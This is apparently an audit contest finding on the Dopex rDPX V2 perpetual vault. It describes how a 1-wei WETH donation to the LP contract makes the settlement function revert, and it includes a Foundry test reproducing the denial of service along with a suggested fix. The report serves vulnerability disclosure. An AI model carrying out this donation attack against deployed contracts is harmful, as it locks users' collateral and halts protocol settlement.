Lines of code
<https://github.com/code-423n4/2023-08-dopex/blob/eb4d4a201b3a75dd4bddc74a34e9c42c71d0d12f/contracts/perp-vault/PerpetualAtlanticVault.sol#L359-L361>
<https://github.com/code-423n4/2023-08-dopex/blob/eb4d4a201b3a75dd4bddc74a34e9c42c71d0d12f/contracts/perp-vault/PerpetualAtlanticVaultLP.sol#L199-L205>
In settle logics, RdpxV2Core contract calls to PerpetualAtlanticVault.settle() to update funding, burn option tokens and do some token settles. However, the logic could be reverted in the call IPerpetualAtlanticVaultLP(addresses.perpetualAtlanticVaultLP).subtractLoss(ethAmount) because of donation attack vector. An attacker could transfer only 1 wei to PerpetualAtlanticVaultLP contract to make the logic in function PerpetualAtlanticVaultLP.subtractLoss get reverted.
So far, the impacts could be: 1.collateral get locked there; 2.protocolβs settling function get DoS; 3. Pay funding for PerpetualAtlanticVault blocked
diff --git a/tests/rdpxV2-core/Unit.t.sol b/tests/rdpxV2-core/Unit.t.sol
index e11c284..a85c296 100644
--- a/tests/rdpxV2-core/Unit.t.sol
+++ b/tests/rdpxV2-core/Unit.t.sol
@@ -333,6 +333,24 @@ contract Unit is ERC721Holder, Setup {
);
}
+ function testSettle_DoS() public {
+ rdpxV2Core.bond(5 * 1e18, 0, address(this));
+ rdpxV2Core.bond(1 * 1e18, 0, address(this));
+
+ vault.addToContractWhitelist(address(rdpxV2Core));
+ uint256[] memory _ids = new uint256[](1);
+ _ids[0] = 0;
+ rdpxPriceOracle.updateRdpxPrice(1e7);
+
+ address attacker = vm.addr(1337);
+ deal(address(weth), attacker, 1 ether);
+ vm.startPrank(attacker);
+ weth.transfer(address(vaultLp), 1);
+ vm.stopPrank();
+ vm.expectRevert("Not enough collateral was sent out");
+ rdpxV2Core.settle(_ids);
+ }
+
function testWithdraw() public {
rdpxV2Core.addToDelegate(1 * 1e18, 10e8);
Foundry
Consider changing the way to track loss in PerpetualAtlanticVaultLP i.e: use ERC20#transfer() to transfer token from PerpetualAtlanticVaultLP to RdpxV2Core contract and then calculate loss within the same function instead of using PerpetualAtlanticVault to call ERC20#transferFrom
DoS
The text was updated successfully, but these errors were encountered:
All reactions